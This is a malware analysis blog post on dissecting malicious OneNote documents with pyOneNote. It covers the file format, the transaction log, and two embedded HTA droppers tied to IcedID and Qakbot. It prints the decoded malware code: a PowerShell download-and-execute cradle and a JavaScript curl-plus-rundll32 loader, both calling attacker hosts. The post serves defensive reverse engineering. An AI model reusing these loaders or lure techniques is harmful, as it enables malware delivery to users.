OneNote Malware Analysis

OneNote Analysis

11 May 2023

By Jacob Pimental

OneNote documents are the latest trend in malware delivery because they do not require macros to run a payload and very few tools can accurately parse the file format. This trend has been seen in the distribution of Qakbot and Redline Stealer. While malware-laced OneNote files may seem to benefit only criminals, the unique file format also offers a few benefits from a forensics perspective. This article walks through analyzing basic OneNote malware using the pyOneNote tool from DissectMalware.


Samples

MD5                               Name
b915056524f1b25937074727cdf5f87c  file_5.hta
c9d2355fc2be90b0fa73ecb67061a77e  file_1.hta

  1. Samples
  2. OneNote Format
    1. Sections
    2. Pages
    3. Outline
    4. Content
    5. Properties and Property Sets
    6. Transaction Log
    7. File Data Object
  3. Basic Analysis
    1. Analyzing Malicious Script
  4. Advantages of the Transaction Log
    1. File_5.hta Analysis
    2. File_1.hta
  5. Conclusion
  6. IOCs
    1. Network Indicators
    2. Samples
  7. Mitre ATT&CK IDs

OneNote Format

OneNote documents consist of sections, pages, outlines, and content, each having their own metadata and attributes. Details of the MS-ONE file format can be found in the specification documents from Microsoft. Below is a brief overview of the structure:

[Figure: Structure of a OneNote document]


Sections

Sections contain pages, metadata, and properties for the OneNote document. A section is what gets exported as a .one file when saving from OneNote. It contains properties such as which pages are contained within the section, the order of those pages, and the name of the section.


Pages

Pages contain the actual content of the OneNote document. This includes text, images, tables, and outlines. Some of the properties associated with a page include the author, the width and height of the page, the last modified timestamp, and whether the page is the first in the section.


Outline

Outlines are a convenient way to group elements together. You can think of an outline as a mini container that stores text, images, tables, file references, etc. Outlines can be placed anywhere on a page and are even allowed to overlap with each other. Outlines have properties for their height, width, and location on the page.


Content

Content is the actual text, images, tables, and data files that go into pages and outlines. Each content element has its own set of unique properties and values.
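
The containment hierarchy described above can be modeled in a few lines of Python. This is only an illustrative sketch: the class and field names are hypothetical and do not correspond to structures in the MS-ONE specification or in pyOneNote.

```python
from dataclasses import dataclass, field
from typing import List, Union


@dataclass
class Content:
    kind: str  # e.g. "text", "image", "table", "file" (illustrative labels)
    properties: dict = field(default_factory=dict)


@dataclass
class Outline:
    x: float
    y: float
    width: float
    height: float
    children: List[Content] = field(default_factory=list)


@dataclass
class Page:
    author: str
    children: List[Union[Outline, Content]] = field(default_factory=list)


@dataclass
class Section:
    name: str
    pages: List[Page] = field(default_factory=list)


def iter_content(section: Section):
    """Yield every Content element in page order, descending into outlines."""
    for page in section.pages:
        for child in page.children:
            if isinstance(child, Outline):
                yield from child.children
            else:
                yield child
```

Walking a section this way mirrors what an analyst cares about: embedded files can sit directly on a page or inside an outline, so both levels have to be visited.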

Properties and Property Sets

Every element within a OneNote document carries a series of properties. Property sets are the groups of properties that make up an element, and their names are often prefixed with jcid, a structure specific to OneNote documents. The property sets within a OneNote file describe the types of elements within that file and how to parse them. Properties are the individual metadata values contained within a property set.

Transaction Log

The transaction log is a special metadata object within a OneNote document that keeps track of changes. This allows the user to view previous versions of a document and see when they were edited. For an analyst, the transaction log can help find additional IOCs associated with a sample and identify previous campaigns the file might have been used in.

File Data Object

A file data object is a special element that contains a binary stream for the type of file it represents. Attackers abuse this by embedding scripts or executables that run when a user double-clicks on them. When a file data object is added to a OneNote document, it is displayed with the icon of the application that will open the file, as shown in the screenshot below:

[Figure: File data object of .hta file]
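
Because the embedded file is stored as a raw binary stream, it can often be carved out of a .one file even without a full parser. The sketch below is not how pyOneNote works internally; it assumes the FileDataStoreObject layout as I recall it from the MS-ONESTORE specification (a 16-byte header GUID, an 8-byte little-endian length, 12 further bytes of unused and reserved fields, then the data). Both the GUID value and the field sizes should be checked against the specification before relying on them.

```python
import struct
import uuid

# Header GUID of a FileDataStoreObject, as recalled from MS-ONESTORE
# (assumption: verify against the specification).
HEADER_GUID = uuid.UUID("BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC").bytes_le


def carve_file_data_objects(data: bytes) -> list:
    """Return the payload of every FileDataStoreObject found in data."""
    payloads = []
    pos = data.find(HEADER_GUID)
    while pos != -1:
        fields = pos + 16  # first byte after the header GUID
        # Assumed layout: cbLength (8 bytes), unused (4), reserved (8).
        if fields + 20 <= len(data):
            (length,) = struct.unpack_from("<Q", data, fields)
            start = fields + 20
            if start + length <= len(data):
                payloads.append(data[start:start + length])
        pos = data.find(HEADER_GUID, pos + 16)
    return payloads
```

Calling `carve_file_data_objects(open(path, "rb").read())` on a sample returns the embedded streams as byte strings, which can then be hashed or written to disk for further analysis.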

Basic Analysis

Taking a look at the sample, we can verify with trid that this is a OneNote document:

[Figure: trid identifying the file as a .one document]
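
If trid is not available, the same check can be approximated by comparing the first 16 bytes of the file with the .one file-type GUID. This is a minimal sketch, not what trid does internally, and the GUID value is quoted from my recollection of the MS-ONESTORE header definition, so treat it as an assumption to confirm.

```python
import uuid

# guidFileType for .one section files, as recalled from MS-ONESTORE
# (assumption: verify against the specification).
ONE_FILE_TYPE = uuid.UUID("7B5C52E4-D88C-4DA7-AEB1-5378D02996D3").bytes_le


def looks_like_onenote(data: bytes) -> bool:
    """Return True if data starts with the .one file-type GUID."""
    return data[:16] == ONE_FILE_TYPE
```

A quick check on disk could read only the first 16 bytes, for example `looks_like_onenote(open(path, "rb").read(16))`.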

Because there is no OLE data as in normal Office documents, we cannot use oletools to parse this file. This is where pyOneNote comes in. pyOneNote will parse the contents of the transaction log and list the changes made in the document. The tool will also extract any embedded files and write them to the directory specified by the -o flag. For example, in the screenshot below pyOneNote is being used to extract embedded files to the “extracted_files” directory.

[Figure: Running pyOneNote on document]

The output makes it clear that several files were pulled from the OneNote document. Three of these files are PNGs that look like they are used to trick a user into clicking a link. The fourth file is JavaScript whose original file path was C:\Autoruns\output1.js. The metadata from the script tells us that the language of the script is set to Russian, and that the alt text for the image NOTE4_WHITE_1.bmp is Russian text that translates to:

Auto-generated alt text:
Connect to the cloud 
This document contains attachments from the cloud 
to receive them, double click "Next" 

[Figure: Embedded JavaScript file information showing the Russian Language ID and name of file]

[Figure: Information about the embedded image including the alt text and name of image file]

[Figure: Image embedded in OneNote document]

Looking at the list of properties found by pyOneNote, we can see a jcidEmbeddedFileNode that matches the output1.js file. This tells us that the author embedded the script in the document so that when a user clicks on it, Windows will open the script in the appropriate application, wscript in this case. Thanks to the transaction log, we can also see the date the script was embedded: 2023-03-17 13:37:19.

[Figure: jcidEmbeddedFileNode property showing the date value]

Analyzing Malicious Script

Now that we know there is an embedded script and have extracted it with pyOneNote, we can begin our analysis. To do this quickly, I am going to use a slightly modified version of box-js, a JavaScript emulator that comes with REMnux. I can launch the malicious script in the emulator using the command:

box-js extracted_files/file_3.js --download

We can see that the script attempts to reach out to multiple C2s and write what looks to be a zip file. It will then extract that file to a new folder and run the unzipped file via regsvr32.exe.

[Figure: box-js analysis results showing C2 connection, file being written, and regsvr32.exe execution]

This shows the power of emulation over having to manually analyze the file. Upon further analysis, the downloaded payload is Emotet, but that is outside the scope of this article.

Advantages of the Transaction Log

The transaction log is extremely useful when analyzing OneNote documents. It allows us to view the changes the document went through and can help us find additional IOCs associated with the sample. For example, when running a second sample through pyOneNote, you will notice that it extracts two .hta files. It is initially unclear which of these files will execute when the user opens the document, but with the help of the transaction log we can see whether any changes were made to these .hta files.

Using the following gawk command on the output of pyOneNote, I was able to pull out only the jcidEmbeddedFileNode properties and their corresponding .hta file.

gawk -v n=8 '{ if( match($0, /\s+(jcid[^\(]+)\(/, arr) ) { if( arr[1]~/jcidEmbeddedFileNode/ ) { print arr[1]; for( i=1; i<=n; i++ ) getline; print; } } }' output.txt

[Figure: List of embedded filenames in the .one document, showing changes made to embedded files]

Based on the output in the screenshot above, we can see that there was a change in the embedded files from Z:\build\one\Open.hta to C:\Users\Admin\Desktop\Open.hta on February 3rd, 2023. We can infer that the latest version of the .hta file is the expected payload for the sample and can continue our analysis from there.
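
For readers more comfortable with Python than gawk, the same filtering can be sketched as below. It mirrors the one-liner's logic only: the regular expression and the offset of 8 lines are taken from the gawk command, and the assumption that the filename sits exactly 8 lines after the property set name depends on the layout of the pyOneNote output used in this article.

```python
import re

# Same pattern as the gawk one-liner: whitespace, a jcid name, then "(".
NODE_RE = re.compile(r"\s+(jcid[^(]+)\(")


def embedded_file_lines(lines, offset=8):
    """Pair each jcidEmbeddedFileNode with the line `offset` lines below it."""
    results = []
    i = 0
    while i < len(lines):
        match = NODE_RE.search(lines[i])
        if match and "jcidEmbeddedFileNode" in match.group(1):
            target = i + offset
            if target < len(lines):
                results.append((match.group(1), lines[target].strip()))
            i = target + 1  # like getline, resume after the printed line
            continue
        i += 1
    return results
```

It can be run over the saved tool output with `embedded_file_lines(open("output.txt").read().splitlines())`.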

File_5.hta Analysis

The latest version of the .hta file was extracted by pyOneNote as file_5.hta. This file contains VBScript code that loops through each index of an array of decimal values and subtracts that value from the character values of a large blob of text. The output is then run through VBScript's Execute function if the folder c:usersta does not exist. Note that c:usersta is not a valid folder name; the author most likely chose it so that the check never succeeds and the malware always runs.

[Figure: First round of obfuscation in file_5.hta]
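
The subtraction scheme described above is easy to reproduce outside of VBScript. The following is a sketch under one assumption the article does not confirm: that the array of decimal values is applied in order and repeats when the text is longer than the array. The function name and the sample values are hypothetical.

```python
def decode_blob(blob: str, keys: list) -> str:
    """Subtract keys[i % len(keys)] from the code of the i-th character."""
    return "".join(
        chr(ord(ch) - keys[i % len(keys)]) for i, ch in enumerate(blob)
    )


# Hypothetical demonstration with a harmless string and made-up key values.
keys = [3, 1, 4]
plain = 'MsgBox "hello"'
encoded = "".join(chr(ord(ch) + keys[i % len(keys)]) for i, ch in enumerate(plain))
print(decode_blob(encoded, keys))
```

Decoding in Python rather than letting the script call Execute keeps the second stage as inert text that can be inspected safely.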

The decoded output runs an encoded PowerShell command that deobfuscates to:

IEX (New-Object Net.Webclient).downloadstring("http://corsanave[.]top/gatef.php")

This will download and execute the content at http://corsanave[.]top/gatef.php, which was down at the time of writing but was associated with IcedID according to this report from Joe Sandbox.

[Figure: Encoded PowerShell run by file_5.hta]
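
The article does not state how the PowerShell command was encoded. If it follows the common -EncodedCommand convention (Base64 over UTF-16LE text), which is an assumption here, it can be decoded with a few lines of Python. The function name is hypothetical and the example string is harmless.

```python
import base64


def decode_encoded_command(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand style string (Base64 of UTF-16LE)."""
    return base64.b64decode(b64).decode("utf-16-le")


# Harmless example: encode a command the same way, then decode it again.
example = base64.b64encode("Write-Output 'hi'".encode("utf-16-le")).decode("ascii")
print(decode_encoded_command(example))
```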


File_1.hta

After analyzing file_5.hta, we should analyze the previous version of the .hta file to fully understand the threat and identify additional IOCs. The previous version of the file was extracted by pyOneNote as file_1.hta. In it, we can see an entirely different version of the .hta file we looked at previously. This version is written in JavaScript as opposed to VBScript and uses a different method of obfuscation.

When first looking at the file we notice a div section defined containing an obfuscated string. We then see the content of this div being written to the registry key HKCU\SOFTWARE\Andromedia\Mp4ToAvi\Values.

Creating div and writing output to registry key Creating div and writing content to registry key

Next, the JavaScript will take the value from that registry key, remove all occurrences of 5&, and use the decoded value to create a function. Using CyberChef, we can see that this function takes a URL as an argument. It then downloads a file from that URL using curl.exe and writes it to C:\ProgramData\index1.png. Finally, the function executes the downloaded file using rundll32.exe with the function Wind. The decoded JavaScript function is below:

function sleep(millis) {
    var date = new Date();
    var curDate = null;
    do { 
        curDate = new Date(); 
    }while(curDate - date < millis);
/** var url = ""; */
new ActiveXObject("").run("curl.exe --output C:\\ProgramData\\index1.png --url " + url, 0);
var shell = new ActiveXObject("shell.application");
shell.shellexecute("rundll32", "C:\\ProgramData\\index1.png,Wind", "", "open", 3);

In the above snippet, we see that a comment was left in for testing the function with the URL “”.

After the Wind function is created, it is run with the hard-coded parameter https://unitedmedicalspecialties[.]com/T1Gpp/OI.png. At the time of writing, this C2 is down but is associated with Qakbot according to this report by Esentire.

Finally, the .hta file will delete the registry key it created using VBScript.

[Figure: Creation of new function and grabbing payload]
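
The marker-stripping step of this deobfuscation can also be reproduced without CyberChef. This is a minimal sketch that only removes the 5& marker named above; the function name and the sample string are hypothetical, and any additional decoding the real script performs is not covered.

```python
def strip_marker(obfuscated: str, marker: str = "5&") -> str:
    """Remove every occurrence of the junk marker from the string."""
    return obfuscated.replace(marker, "")


# Hypothetical sample showing how the marker hides a keyword.
print(strip_marker("fu5&nct5&ion"))
```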


Conclusion

Thanks to tools like pyOneNote, OneNote documents can be analyzed without having the actual OneNote application installed on your machine. This is useful for those without a Microsoft 365 subscription or without access to a Windows machine. We also used the transaction log associated with OneNote documents to extract a previous version of the payload that was associated with a different campaign entirely! This leads us to believe that whoever wrote the IcedID payload might have used a copy of the Qakbot payload as a template.

Thanks for reading and happy reversing!


IOCs

Network Indicators

Sample 1
Sample 2


Samples

MD5                               Name
b915056524f1b25937074727cdf5f87c  file_5.hta
c9d2355fc2be90b0fa73ecb67061a77e  file_1.hta
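
To compare files extracted by pyOneNote against the hashes above, their MD5 digests can be computed with Python's standard library. This is a small sketch; the directory name in the usage note is the one used earlier in this article, and the function names are hypothetical.

```python
import hashlib
from pathlib import Path


def md5_of(path, chunk_size=65536) -> str:
    """Return the hex MD5 digest of a file, reading it in chunks."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def hash_directory(directory) -> dict:
    """Map each file name in directory to its MD5 digest."""
    return {
        p.name: md5_of(p)
        for p in sorted(Path(directory).iterdir())
        if p.is_file()
    }
```

For example, `hash_directory("extracted_files")` returns a dictionary that can be checked against the table of sample hashes.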

Mitre ATT&CK IDs

ID Name
T1071.001 Application Layer Protocol: Web Protocols
T1218.010 System Binary Proxy Execution: Regsvr32
T1105 Ingress Tool Transfer
T1059.001 Command and Scripting Interpreter: PowerShell
T1204.002 User Execution: Malicious File
T1112 Modify Registry
T1218.011 System Binary Proxy Execution: Rundll32
